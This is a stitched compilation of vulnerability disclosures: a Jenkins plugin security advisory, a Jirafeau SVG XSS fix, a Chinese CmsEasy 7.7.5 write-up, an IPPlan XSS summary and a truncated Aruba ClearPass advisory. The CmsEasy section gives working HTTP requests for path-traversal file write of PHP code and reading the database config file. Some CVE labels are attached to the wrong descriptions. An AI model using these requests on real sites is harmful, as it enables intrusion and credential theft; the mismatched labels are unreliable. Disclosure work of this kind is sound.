Jenkins Pipeline: Groovy Plugin 2689.v434009a_31b_f1 and earlier allows loading any Groovy source files on the classpath of Jenkins and Jenkins plugins in sandboxed pipelines.

This advisory announces vulnerabilities in the following Jenkins deliverables:

*   Application Detector Plugin
*   Autocomplete Parameter Plugin
*   Blue Ocean Plugin
*   Git Plugin
*   GitLab Plugin
*   Global Variable String Parameter Plugin
*   JDK Parameter Plugin
*   Mercurial Plugin
*   Multiselect parameter Plugin
*   Pipeline SCM API for Blue Ocean Plugin
*   Pipeline: Groovy Plugin
*   Promoted Builds (Simple) Plugin
*   Random String Parameter Plugin
*   REPO Plugin
*   Rundeck Plugin
*   Script Security Plugin
*   Selection tasks Plugin
*   SSH Plugin
*   Storable Configs Plugin
*   vboxwrapper Plugin
*   WMI Windows Agents Plugin

**Descriptions****Sandbox bypass vulnerability through implicitly allowlisted platform Groovy files in Pipeline: Groovy Plugin**

**SECURITY-359 / CVE-2022-30945**

Pipeline: Groovy Plugin allows pipelines to load Groovy source files. This is intended to be used to allow Global Shared Libraries to execute without sandbox protection.

In Pipeline: Groovy Plugin 2689.v434009a\_31b\_f1 and earlier, any Groovy source files bundled with Jenkins core and plugins could be loaded this way and their methods executed. If a suitable Groovy source file is available on the classpath of Jenkins, sandbox protections can be bypassed.

Note

The Jenkins security team has been unable to identify any Groovy source files in Jenkins core or plugins that would allow attackers to execute dangerous code. While the severity of this issue is declared as High due to the potential impact, successful exploitation is considered very unlikely.

Pipeline: Groovy Plugin 2692.v76b\_089ccd026 restricts which Groovy source files can be loaded in Pipelines.

Groovy source files in public plugins intended to be executed in sandboxed pipelines have been identified and added to an allowlist. The new extension point org.jenkinsci.plugins.workflow.cps.GroovySourceFileAllowlist allows plugins to add specific Groovy source files to that allowlist if necessary, but creation of plugin-specific Pipeline DSLs is strongly discouraged.

**CSRF vulnerability in Script Security Plugin**

**SECURITY-2116 / CVE-2022-30946**

Script Security Plugin 1158.v7c1b\_73a\_69a\_08 and earlier does not require POST requests for a form validation endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to have Jenkins send an HTTP request to an attacker-specified webserver.

This form validation method no longer sends HTTP requests in Script Security Plugin 1172.v35f6a\_0b\_8207e.

**Multiple SCM plugins can check out from the controller file system**

**SECURITY-2478 / CVE-2022-30947 (Git), CVE-2022-30948 (Mercurial), CVE-2022-30949 (REPO)**

SCMs support a number of different URL schemes, including local file system paths (e.g. using file: URLs).

Historically in Jenkins, only agents checked out from SCM, and if multiple projects share the same agent, there is no expected isolation between builds besides using different workspaces unless overridden. Some Pipeline-related features check out SCMs from the Jenkins controller as well.

This allows attackers able to configure pipelines to check out some SCM repositories stored on the Jenkins controller’s file system using local paths as SCM URLs, obtaining limited information about other projects' SCM contents. The following Jenkins plugins are known to be affected:

*   Git 4.11.1 and earlier
    
*   Mercurial 2.16 and earlier
    
*   REPO 1.14.0 and earlier
    

Affected plugins have been updated to reject local file paths being checked out on the controller:

*   Git 4.11.2
    
*   Mercurial 2.16.1
    
*   REPO 1.15.0
    

**Multiple vulnerabilities in Windows Remote Command library in WMI Windows Agents Plugin**

**SECURITY-2604 / CVE-2022-30950 (buffer overflow), CVE-2022-30951 (access control)**

WMI Windows Agents Plugin 1.8 and earlier includes the Windows Remote Command library. It provides a general-purpose remote command execution capability that Jenkins uses to check if Java is available, and if not, to install it.

This library has a buffer overflow vulnerability that may allow users able to connect to a named pipe to execute commands on the Windows agent machine.

Additionally, while the processes are started as the user who connects to the named pipe, no access control takes place, potentially allowing users to start processes even if they’re not allowed to log in.

WMI Windows Agents Plugin 1.8.1 no longer includes the Windows Remote Command library. A Java runtime is expected to be available on agent machines and WMI Windows Agents Plugin 1.8.1 does not install a JDK automatically otherwise.

Note

WMI Windows Agents Plugin is the only Jenkins project deliverable the Jenkins project security team is aware of that includes the Windows Remote Command library.

**User-scoped credentials exposed to other users by Pipeline SCM API for Blue Ocean Plugin**

**SECURITY-714 / CVE-2022-30952**

When pipelines are created using the pipeline creation wizard in Blue Ocean, the credentials used are stored in the per-user credentials store of the user creating the pipeline. To allow pipelines to use this credential to scan repositories and checkout from SCM, the Blue Ocean Credentials Provider allows pipelines to access a specific credential from the per-user credentials store in Pipeline SCM API for Blue Ocean Plugin 1.25.3 and earlier.

As a result, attackers with Job/Configure permission can rewrite job configurations in a way that lets them access and capture any attacker-specified credential from any user’s private credentials store.

Pipeline SCM API for Blue Ocean Plugin 1.25.4 deprecates the Blue Ocean Credentials Provider and disables it by default. As a result, all jobs initially set up using the Blue Ocean pipeline creation wizard and configured to use the credential specified at that time will no longer be able to access the credential, resulting in failures to scan repositories, checkout from SCM, etc. unless the repository is public and can be accessed without credentials.

Note

This also applies to newly created pipelines after Pipeline SCM API for Blue Ocean Plugin has been updated to 1.25.4.

Administrators should reconfigure affected pipelines to use a credential from the Jenkins credential store or a folder credential store. See this help page on cloudbees.com to learn more.

To re-enable the Blue Ocean Credentials Provider, set the Java system property io.jenkins.blueocean.rest.impl.pipeline.credential.BlueOceanCredentialsProvider.enabled to true. Doing so is discouraged, as that will restore the unsafe behavior.

Note

While Credentials Plugin provides the _Configure Credential Providers_ UI to enable or disable certain credentials providers, enabling the Blue Ocean Credentials Provider there is not enough in Pipeline SCM API for Blue Ocean Plugin 1.25.4. Both the UI and system property need to enable the Blue Ocean Credentials Provider.

Administrators not immediately able to update Blue Ocean are advised to disable the Blue Ocean Credentials Provider through the UI at _Manage Jenkins » Configure Credential Providers_ and to reconfigure affected pipelines to use a credential from the Jenkins credential store or a folder credential store.

**CSRF vulnerability and missing permission checks in Blue Ocean Plugin**

**SECURITY-2502 / CVE-2022-30953 (CSRF), CVE-2022-30954 (permission check)**

Blue Ocean Plugin 1.25.3 and earlier does not perform permission checks in several HTTP endpoints.

This allows attackers with Overall/Read permission to send requests to an attacker-specified URL.

Additionally, these endpoints do not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

Blue Ocean Plugin 1.25.4 requires POST requests and the appropriate permissions for the affected HTTP endpoints.

**Missing permission check in GitLab Plugin allows enumerating credentials IDs**

**SECURITY-2753 / CVE-2022-30955**

GitLab Plugin 1.5.31 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

An enumeration of credentials IDs in GitLab Plugin 1.5.32 requires the appropriate permissions.

**Stored XSS vulnerability in Rundeck Plugin**

**SECURITY-2600 / CVE-2022-30956**

Rundeck Plugin 3.6.10 and earlier does not restrict URL schemes in Rundeck webhook submissions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to submit crafted Rundeck webhook payloads.

Rundeck Plugin 3.6.11 sanitizes URLs submitted in Rundeck webhook payloads.

**Missing permission check in SSH Plugin allows enumerating credentials IDs**

**SECURITY-2315 / CVE-2022-30957**

SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.

**CSRF vulnerability and missing permission checks in SSH Plugin allow capturing credentials**

**SECURITY-2093 / CVE-2022-30958 (CSRF), CVE-2022-30959 (permission check)**

SSH Plugin 2.6.1 and earlier does not perform a permission check in an HTTP endpoint.

This allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

Additionally, this endpoint does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerabilities in multiple plugins providing additional parameter types**

**SECURITY-2717 / CVE-2022-30960 (Application Detector), CVE-2022-30961 (Autocomplete Parameter), CVE-2022-30962 (Global Variable String Parameter), CVE-2022-30963 (JDK Parameter), CVE-2022-30964 (Multiselect parameter), CVE-2022-30965 (Promoted Builds (Simple)), CVE-2022-30966 (Random String Parameter), CVE-2022-30967 (Selection tasks), CVE-2022-30968 (vboxwrapper)**

Multiple plugins do not escape the name and description of the parameter types they provide:

*   Application Detector Plugin 1.0.8 and earlier (SECURITY-2732 / CVE-2022-30960)
    
*   Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 / CVE-2022-30961)
    
*   Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 / CVE-2022-30962)
    
*   JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
    
*   Multiselect parameter Plugin 1.3 and earlier (SECURITY-2726 / CVE-2022-30964)
    
*   Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 / CVE-2022-30965)
    
*   Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 / CVE-2022-30966)
    
*   Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
    
*   vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)
    

This results in stored cross-site scripting (XSS) vulnerabilites exploitable by attackers with Item/Configure permission.

Exploitation of these vulnerabilities requires that parameters are listed on another page, like the "Build With Parameters" and "Parameters" pages provided by Jenkins (core), and that those pages are not hardened to prevent exploitation. Jenkins (core) has prevented exploitation of vulnerabilities of this kind on the "Build With Parameters" and "Parameters" pages since 2.44 and LTS 2.32.2 as part of the SECURITY-353 / CVE-2017-2601 fix. Additionally, several plugins have previously been updated to list parameters in a way that prevents exploitation by default, see SECURITY-2617 in the 2022-04-12 security advisory for a list.

The following plugins have been updated to escape the name and description of the parameter types they provide in the versions specified:

*   Application Detector Plugin 1.0.9
    
*   Multiselect parameter Plugin 1.4
    

As of publication of this advisory, there is no fix available for the following plugins:

*   Autocomplete Parameter Plugin 1.1 and earlier (SECURITY-2729 / CVE-2022-30961)
    
*   Global Variable String Parameter Plugin 1.2 and earlier (SECURITY-2715 / CVE-2022-30962)
    
*   JDK Parameter Plugin 1.0 and earlier (SECURITY-2713 / CVE-2022-30963)
    
*   Promoted Builds (Simple) Plugin 1.9 and earlier (SECURITY-2720 / CVE-2022-30965)
    
*   Random String Parameter Plugin 1.0 and earlier (SECURITY-2722 / CVE-2022-30966)
    
*   Selection tasks Plugin 1.0 and earlier (SECURITY-2728 / CVE-2022-30967)
    
*   vboxwrapper Plugin 1.3 and earlier (SECURITY-2734 / CVE-2022-30968)
    

**CSRF vulnerability in Autocomplete Parameter Plugin results in RCE**

**SECURITY-2322 / CVE-2022-30969**

Autocomplete Parameter Plugin 1.1 and earlier does not require POST requests for a form validation endpoint executing a provided Groovy script, resulting in a cross-site request forgery (CSRF) vulnerability.

This vulnerability allows attackers to execute arbitrary code without sandbox protection if the victim is an administrator.

As of publication of this advisory, there is no fix.

**Stored XSS vulnerability in Autocomplete Parameter Plugin**

**SECURITY-2267 / CVE-2022-30970**

Autocomplete Parameter Plugin 1.1 and earlier references Dropdown Autocomplete parameter and Auto Complete String parameter names in an unsafe manner from Javascript embedded in view definitions.

This results in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

Note

While this looks similar to SECURITY-2729, this is an independent problem and exploitable even on views rendering parameters that otherwise attempt to prevent XSS vulnerabilities in parameter names.

As of publication of this advisory, there is no fix.

**XXE vulnerability in Storable Configs Plugin**

**SECURITY-1969 / CVE-2022-30971 (XXE), CVE-2022-30972 (CSRF)**

Storable Configs Plugin 1.0 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

This allows attackers with Item/Configure permission to have Jenkins parse a crafted file that uses external entities for extraction of secrets from the Jenkins controller or server-side request forgery.

Additionally, the HTTP endpoint calling the XML parser does not require POST requests, resulting in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.

**Severity**

*   SECURITY-359: High
*   SECURITY-714: Medium
*   SECURITY-1969: High
*   SECURITY-2093: High
*   SECURITY-2116: Medium
*   SECURITY-2267: High
*   SECURITY-2315: Medium
*   SECURITY-2322: High
*   SECURITY-2478: Low
*   SECURITY-2502: Medium
*   SECURITY-2600: High
*   SECURITY-2604: Medium
*   SECURITY-2717: High
*   SECURITY-2753: Medium

**Affected Versions**

*   **Application Detector Plugin** up to and including 1.0.8
*   **Autocomplete Parameter Plugin** up to and including 1.1
*   **Blue Ocean Plugin** up to and including 1.25.3
*   **Git Plugin** up to and including 4.11.1
*   **GitLab Plugin** up to and including 1.5.31
*   **Global Variable String Parameter Plugin** up to and including 1.2
*   **JDK Parameter Plugin** up to and including 1.0
*   **Mercurial Plugin** up to and including 2.16
*   **Multiselect parameter Plugin** up to and including 1.3
*   **Pipeline SCM API for Blue Ocean Plugin** up to and including 1.25.3
*   **Pipeline: Groovy Plugin** up to and including 2689.v434009a\_31b\_f1
*   **Promoted Builds (Simple) Plugin** up to and including 1.9
*   **Random String Parameter Plugin** up to and including 1.0
*   **REPO Plugin** up to and including 1.14.0
*   **Rundeck Plugin** up to and including 3.6.10
*   **Script Security Plugin** up to and including 1158.v7c1b\_73a\_69a\_08
*   **Selection tasks Plugin** up to and including 1.0
*   **SSH Plugin** up to and including 2.6.1
*   **Storable Configs Plugin** up to and including 1.0
*   **vboxwrapper Plugin** up to and including 1.3
*   **WMI Windows Agents Plugin** up to and including 1.8

**Fix**

*   **Application Detector Plugin** should be updated to version 1.0.9
*   **Blue Ocean Plugin** should be updated to version 1.25.4
*   **Git Plugin** should be updated to version 4.11.2
*   **GitLab Plugin** should be updated to version 1.5.32
*   **Mercurial Plugin** should be updated to version 2.16.1
*   **Multiselect parameter Plugin** should be updated to version 1.4
*   **Pipeline SCM API for Blue Ocean Plugin** should be updated to version 1.25.4
*   **Pipeline: Groovy Plugin** should be updated to version 2692.v76b\_089ccd026
*   **REPO Plugin** should be updated to version 1.14.1
*   **Rundeck Plugin** should be updated to version 3.6.11
*   **Script Security Plugin** should be updated to version 1172.v35f6a\_0b\_8207e
*   **WMI Windows Agents Plugin** should be updated to version 1.8.1

These versions include fixes to the vulnerabilities described above. All prior versions are considered to be affected by these vulnerabilities unless otherwise indicated.

As of publication of this advisory, no fixes are available for the following plugins:

*   Autocomplete Parameter Plugin
*   Global Variable String Parameter Plugin
*   JDK Parameter Plugin
*   Promoted Builds (Simple) Plugin
*   Random String Parameter Plugin
*   Selection tasks Plugin
*   SSH Plugin
*   Storable Configs Plugin
*   vboxwrapper Plugin

**Credit**

The Jenkins project would like to thank the reporters for discovering and reporting these vulnerabilities:

*   **Daniel Beck, CloudBees, Inc.** for SECURITY-1969, SECURITY-2478
*   **Jesse Glick, CloudBees, Inc.** for SECURITY-359
*   **Kalle Niemitalo, Procomp Solutions Oy** for SECURITY-2604
*   **Kevin Guerroudj** for SECURITY-2267
*   **Kevin Guerroudj, CloudBees, Inc.** for SECURITY-2600, SECURITY-2753
*   **Kevin Guerroudj, CloudBees, Inc., Wadeck Follonier, CloudBees, Inc., and Daniel Beck, CloudBees, Inc.** for SECURITY-2717
*   **Kevin Guerroudj, Justin Philip, Marc Heyries, Wadeck Follonier, CloudBees, Inc.** for SECURITY-2322
*   **Long Nguyen, Viettel Cyber Security** for SECURITY-2093
*   **Tanner Emek from Tinder Security Labs** for SECURITY-2502
*   **Wadeck Follonier, CloudBees, Inc.** for SECURITY-2315

CVE-2022-30945: Jenkins Security Advisory 2022-05-17

Jenkins Autocomplete Parameter Plugin 1.1 and earlier references Dropdown Autocomplete parameter and Auto Complete String parameter names in an unsafe manner from Javascript embedded in view definitions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-30970: Jenkins Security Advisory 2022-05-17

Jenkins Rundeck Plugin 3.6.10 and earlier does not restrict URL schemes in Rundeck webhook submissions, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to submit crafted Rundeck webhook payloads.

CVE-2022-30956: Jenkins Security Advisory 2022-05-17

A missing permission check in Jenkins SSH Plugin 2.6.1 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified SSH server using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins.

CVE-2022-30959: Jenkins Security Advisory 2022-05-17

The file preview functionality in Jirafeau < 4.4.0, which is enabled by default, could be exploited for cross site scripting. An attacker could upload image/svg+xml files containing JavaScript. When someone visits the File Preview URL for this file, the JavaScript inside of this image/svg+xml file will be executed in the users' browser.

Merged requested to merge wouterdedroog/Jirafeau:master into next-release Mar 21, 2022

*   Overview 1
*   Commits 3
*   Changes 6

This PR fixes the issue I've privately disclosed in #284.

EDIT: Since this issue is now fixed I feel comfortable in sharing the details. In Jirafeau versions before 4.4.0, it was possible to exploit the File Preview functionality to execute JavaScript for every user that visited a specifically crafted file preview.

This was possible because image/svg+xml were directly shown to the user. image/svg+xml files can contain executable JavaScript, meaning that a malicious actor could upload an SVG file containing JavaScript. When a user would visit this page, the JavaScript embedded in this file would be executed. This could for example lead to account takeovers or redirect users to phishing pages.

As an example, the following SVG file could be uploaded: test.svg. When a user visits the Jirafeau preview link for this image in versions before 4.4.0, an alert box will open with the current URL.

Edited Apr 30, 2022 by Wouter de Droog

CVE-2022-30110: [BUGFIX] Disallow file preview for image/svg+xml files (!103) · Merge requests · Jérôme Jutteau / Jirafeau · GitLab

cmseasy V7.7.5_20211012 is affected by an arbitrary file read vulnerability. After login, the configuration file information of the website such as the database configuration file (config / config_database) can be read through this vulnerability.

*   0day挖掘
*   2021-10-14

CmsEasy\_7.7.5\_20211012存在任意文件写入漏洞和任意文件读取漏洞

**一、厂商官网**

cmseasy

**二、安装包下载**

https://www.cmseasy.cn/download/

https://ftp.cmseasy.cn/CmsEasy7.x/CmsEasy\_7.7.5\_UTF-8\_20211012.zip

**2.1 任意文件写入漏洞getshell**

后台漏洞，需登录。

**2.2.1 任意文件写入漏洞poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

POST /index.php?case=template&act=save&admin\_dir=admin&site=default HTTP/1.1  
Host: 192.168.31.96  
Content-Length: 57  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0  
Content-Type: application/x-www-form-urlencoded;  
Cookie: login\_username=admin; login\_password=357fce333f91905f3e7342d10e5a5ce4;  
Connection: close  
  
sid=#data\_d\_..\_d\_..\_d\_..\_d\_1.php&slen=693&scontent=<?php phpinfo();?>  

.._d_ 代表  ../，此处用来路径穿越

发送漏洞利用的poc数据包，响应内容是ok时，代表网站根目录下被写入了1.php文件。

访问http://192.168.31.96/1.php (或者是http://localhost/1.php)，此时发现phpinfo被成功执行。

**2.2.2 任意文件写入漏洞代码分析**

出现此漏洞的文件是lib/admin/template_admin.php

post方法传入sid=#data_d_.._d_.._d_.._d_1.php，经过一轮的正则替换，最后tpl=data/../../../1.php

post方法传入scontent=<?php phpinfo();?>，先通过编码实例化，再通过正则替换将单引号转义，此时content=<?php phpinfo();?>，这里的正则处理是对XSS漏洞的处理，对写入的php代码不生效。

当site=default时，代码执行到最外层else处（第2789行），此过程中，content值不变，通过file_put_contents造成了任意文件写入漏洞。

**2.2 任意文件读取漏洞**

后台漏洞，需登录。

**2.2.1 任意文件读取漏洞poc**

1  
2  
3  
4  
5  
6  
7  
8  
9  
10  

POST /index.php?case=template&act=fetch&admin\_dir=admin&site=default HTTP/1.1  
Host: 192.168.31.96  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0  
Content-Type: application/x-www-form-urlencoded;  
Cookie: login\_username=admin; login\_password=357fce333f91905f3e7342d10e5a5ce4;   
Connection: close  
Content-Length: 32  
  
id=#data\_d\_..\_d\_..\_d\_..\_d\_config\_d\_config\_database.php  

.._d_ 代表  ../，此处用来路径穿越

发送漏洞利用的poc数据包

响应内容是cmseasy网站配置文件config/config_database.php的文件内容信息。

该响应信息中包含了数据库连接地址账号以及密码。

**2.2.2 任意文件读取漏洞代码分析**

出现此漏洞的文件是lib/admin/template_admin.php

post方法传入id=#data_d_.._d_.._d_.._d_config_d_config_database.php

通过一系列的正则替换tpl=data/../../../config/config_database.php

最后通过第2757行的file_get_contents函数读取到了配置文件信息。

CVE-2021-42644: CmsEasy_7.7.5_20211012存在任意文件写入和任意文件读取漏洞

Stored cross-site scripting (XSS) in admin/usermanager.php over IPPlan v4.92b allows remote attackers to inject arbitrary web script or HTML via the userid parameter.

May 16, 2022 Uncategorized

Stored cross-site scripting (XSS) in admin/usermanager.php over IPPlan v4.92b allows remote attackers to inject arbitrary web script or HTML via the userid parameter

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42943
*   https://vuldb.com/?id.200027

**Details**

In a nutshell, given the lack of validations among certain input fields controlled by the user, we can only notice a “trim” for the userid parameter(code:admin/usermanager.php -> administrator$userid=trim($userid);) that’s also accepting strings in a form that should not be controlled by the user during the user creation:

User creation

Given the way this data is stored in the database and rendered by the PHP application (i.e., directly from the DB), it makes possible to proceed with different set of injections such as the example below with our javascript injection, corresponding the CVE-2021-42943

DB data

Persistent XSS PoC

**Remediation**

Although ipplan isn’t a brand new application, it seems we have different organizations relying on its functionalities as the information provided can be very useful in order to track the network segmentation across a given environment. If this is your scenario and you want to get rid of such vulnerabilities, ensure to avoid the user ID parameter of the UI and let the database control such information with the proper increment, having the primary keys and foreign keys accordingly which will require a few changes on the code and also in the database structure. Another option that can reduce the impact of such scenario is to use an INT data type for your column. Also, ensure to add the validation/sanitization such as the usage of htmlspecialchars() function within PHP in order to convert special characters to HTML entities correctly.

CVE-2021-42943: CVE-2021-42943 – Summary – Paulo Hennig

A authenticated remote command injection vulnerability was discovered in Aruba ClearPass Policy Manager version(s): 6.10.4 and below, 6.9.9 and below, 6.8.9-HF2 and below, 6.7.x and below. Aruba has released updates to ClearPass Policy Manager that address this security vulnerability.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2022-007 CVE: CVE-2021-21419, CVE-2021-33503, CVE-2022-23657, CVE-2022-23658, CVE-2022-23659, CVE-2022-23660, CVE-2022-23661, CVE-2022-23662, CVE-2022-23663, CVE-2022-23664, CVE-2022-23665, CVE-2022-23666, CVE-2022-23667, CVE-2022-23668, CVE-2022-23669, CVE-2022-23670, CVE-2022-23671, CVE-2022-23672, CVE-2022-23673, CVE-2022-23674, CVE-2022-23675 Publication Date: 2022-May-04 Status: Confirmed Severity: Critical Revision: 1 Title ===== ClearPass Policy Manager Multiple Vulnerabilities Overview ======== Aruba has released updates to ClearPass Policy Manager that address multiple security vulnerabilities. Affected Products ================= These vulnerabilities affect ClearPass Policy Manager running the following patch versions unless specifically noted otherwise in the details section: - ClearPass Policy Manager 6.10.x: 6.10.4 and below - ClearPass Policy Manager 6.9.x: 6.9.9 and below - ClearPass Policy Manager 6.8.x: 6.8.9-HF2 and below Updating ClearPass Policy Manager to a patch version listed in the Resolution section at the end of this advisory will resolve all issues in the details section. Versions of ClearPass Policy Manager that are end of life should be considered to be affected by these vulnerabilities unless otherwise indicated. Impacted customers should plan to migrate to a supported version. Versions that should be considered to be vulnerable and not addressed by this advisory include: - ClearPass Policy Manager 6.7.x and below Details ======= Authentication Bypass Leading to Remote Code Execution in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23657, CVE-2022-23658, CVE-2022-23660) --------------------------------------------------------------------- Vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to run arbitrary commands on the underlying host. Successful exploitation of these vulnerabilities allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-156, ATLCP-162, ATLCP-163 Severity: Critical CVSSv3.x Overall Score: 9.8 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Information Disclosure in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23670) --------------------------------------------------------------------- A vulnerability in the web-based management interface of ClearPass Policy Manager could allow a remote attacker authenticated with low privileges to access sensitive information. A successful exploit allows an attacker to retrieve information which could be used to potentially gain further access to network services supported by ClearPass Policy Manager. Internal Reference: ATLCP-169 Severity: High CVSSv3.x Overall Score: 8.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N Discovery: This vulnerability was discovered and reported by Colton Bachman of Aruba Threat Labs. Sensitive Information Disclosure in ClearPass Policy Manager Cluster via Privileged Network Position (CVE-2022-23671) --------------------------------------------------------------------- A vulnerability exists in the ClearPass Policy Manager cluster communications that allow for an attacker in a privileged network position to potentially obtain sensitive information. A successful exploit could allow an attacker to retrieve information that allows for unauthorized actions as a privileged user on the ClearPass Policy Manager cluster. Internal Reference: ATLCP-182 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H Discovery: This vulnerability was discovered and reported by the Central College Security Team. Authenticated Stored Cross-Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23674, CVE-2022-23675) --------------------------------------------------------------------- Multiple vulnerabilities in the web-based management interface of ClearPass Policy Manager could allow an authenticated remote attacker to conduct a stored cross-site scripting (XSS) attack against an administrative user of the interface. A successful exploit allows an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal References: ATLCP-176, ATLCP-185 Severity: High CVSSv3.x Overall Score: 7.5 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L Discovery: These vulnerabilities were discovered and reported by Rahul Mohan of Aruba Networks and Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Full System Compromise (CVE-2022-23661, CVE-2022-23662) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager command line interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-77, ATLCP-107 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Erik De Jong (bugcrowd.com/erikdejong) via Aruba's Bug Bounty Program. Authenticated Remote Command Injection in ClearPass Policy Manager Web-Based Management Interface Leading to Full System Compromise (CVE-2022-23663, CVE-2022-23664, CVE-2021-23665, CVE-2022-23666, CVE-2022-23672, CVE-2022-23673) --------------------------------------------------------------------- Vulnerabilities in the ClearPass Policy Manager web-based management interface allow remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as root on the underlying operating system leading to complete system compromise. Internal References: ATLCP-140, ATLCP-141, ATLCP-157, ATLCP-160, ATLCP-161, ATLCP-172 Severity: High CVSSv3.x Overall Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discovery: These vulnerabilities were discovered and reported by Daniel Jensen (@dozernz) via Aruba's Bug Bounty Program. Reflected Cross Site Scripting Vulnerability (XSS) in ClearPass Policy Manager Web-Based Management Interface (CVE-2022-23659) --------------------------------------------------------------------- A vulnerability within the web-based management interface of ClearPass Policy Manager could allow a remote attacker to conduct a reflected cross-site scripting (XSS) attack against a user of the interface. A successful exploit could allow an attacker to execute arbitrary script code in a victim’s browser in the context of the affected interface. Internal Reference: ATLCP-181 Severity: Medium CVSSv3.x Overall Score: 6.6 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by the Memorial Hermann Security Team. Improper Handling of Highly Compressed Data (Data Amplification) and Memory Allocation with Excessive Size Value in Python Eventlet Library (CVE-2021-21419) -------------------------------------------------------------------- A vulnerability exists in the Python Eventlet library used by ClearPass Policy Manager. This could allow a WebSocket peer to exhaust memory reserved by Eventlet inside of ClearPass Policy Manager leading to a partial Denial of Service condition in services that use the library. For more details, please refer to https://github.com/advisories/GHSA-9p9m-jm8w-94p2 Internal Reference: ATLCP-158 Severity: Medium CVSSv3.x Overall Score: 5.3 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L Discovery: This vulnerability was discovered by the maintainers of the Eventlet repository on GitHub. Authorization Bypass in ClearPass Policy Manager via Insufficient Session Expiration (CVE-2022-23669) --------------------------------------------------------------------- A vulnerability exists in the handling of SAML token expiration by ClearPass Policy Manager. A successful exploit could allow an attacker in the possession of a valid token to reuse the token after session expiration, thereby achieving a bypass of the normal authorization process. Internal Reference: ATLCP-171 Severity: Medium CVSSv3.x Overall Score: 5.0 CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L Discovery: This vulnerability was discovered and reported by Tomas Rzepka of F-Secure. Authenticated Denial-of-Service Condition in Python Urllib Library Used by ClearPass Policy Manager (CVE-2021-33503) -------------------------------------------------------------------- A vulnerability exists in the Python Urllib library used by ClearPass Policy Manager. An authenticated attacker can exploit this condition via the web-based management interface to create a denial-of-service condition in the interface. For more details, please refer to https://github.com/advisories/GHSA-q2q7-5pp4-w6pg Internal Reference: ATLCP-165 Severity: Medium CVSSv3.x Overall Score: 4.9 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H Discovery: This vulnerability was discovered by Nariyoshi Chida. Authenticated Remote Command Injection in ClearPass Policy Manager Command Line Interface Leading to Partial System Compromise (CVE-2022-23667) --------------------------------------------------------------------- A vulnerability in the ClearPass Policy Manager command line interface allows remote authenticated users to run arbitrary commands on the underlying host. A successful exploit could allow an attacker to execute arbitrary commands as a lower privileged user on the underlying operating system leading to partial system compromise. Internal Reference: ATLCP-92 